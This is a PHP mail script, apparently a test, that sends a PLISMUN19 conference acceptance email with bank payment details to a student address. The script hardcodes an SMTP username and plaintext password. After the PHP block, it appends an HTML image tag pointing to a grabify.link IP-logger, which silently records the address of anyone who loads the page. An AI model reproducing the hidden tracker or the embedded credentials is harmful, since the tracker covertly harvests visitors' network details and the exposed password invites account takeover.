
<?php


require_once('class.phpmailer.php');
//include("class.smtp.php"); // optional, gets called from within class.phpmailer.php if not already loaded

$mail             = new PHPMailer();
$body             = "<h2>Your delegate application has been accepted by the approval team!</h2>

<p>Dear ".$delegate_info['firstname']. ' ' .$delegate_info['lastname'].", </p>
<p>We are pleased to inform you that your application to PLISMUN19 has been approved! </p>
<p>You have been selected to represent <b>".$display_country."</b> in the <b>".strtoupper($committee)."</b> committee. To view your committee, head over to <a href='plismun.com/viewcommittee'>plismun.com/viewcommittee</a><br /><br /></p>
<h4>Payment details:</h4>
<p><b>Below you will find the details to which the fee of €44 should be paid to <i><u>within 2 weeks of receiving this email</u></i> with your name and 'PLISMUN19' included in the payment note:</b><br /></p>
<p>CZK Account number: 2107914717/2700<br />
IBAN: CZ88 2700 0000 0021 0791 4717<br />
SWIFT: BACXCZPP<br />
Variable code: 190101<br />
Bank name: UniCredit bank Na Příkopě 858/20 113 80 Praha 1</p>
<p><b>Using Internet banking, you must select either international wire transfer (non-domestic; you are paying with a foreign currency to a CZK account) or domestic payment (paying CZK to CZK account).</b></p>
<p><b><i>Once the payment has been made, please email a copy of the invoice to <a href='mailto:plismun.official@gmail.com'>plismun.official@gmail.com</a> so we can confirm your payment</i></b><br /></p>
<p>Thank you for your interest and participation in PLISMUN19, we look forward to seeing you in January!</p>



<p><br><br><i>This is an automated message generated by <a href='plismun.com'>plismun.com</a>. Please do not reply to this email. If you would like to contact us, head to <a href='plismun.com/contact'>plismun.com/contact</a> </i></p>";

$mail->IsSMTP(); // telling the class to use SMTP

$mail->SMTPAuth   = true;                  // enable SMTP authentication
$mail->Host       = "mx1.hostinger.com"; // sets the SMTP server
$mail->Port = 587;

$mail->Username   = "info@plismun.com"; // SMTP account username
$mail->Password   = "plismun123";        // SMTP account password

$mail->SetFrom('info@plismun.com', 'this is a test');

// $mail->AddReplyTo("name@yourdomain.com","First Last");

$mail->Subject    = "ahhhh";


$mail->MsgHTML($body);

$address = "pupil.jason.wang@parklane-is.com";
$mail->AddAddress($address);


if(!$mail->Send()) {
  echo "Mailer Error: " . $mail->ErrorInfo;
} else {
  echo "Message sent!";
}

?>

<html><body><img src="https://grabify.link/63CASP" /></body></html>
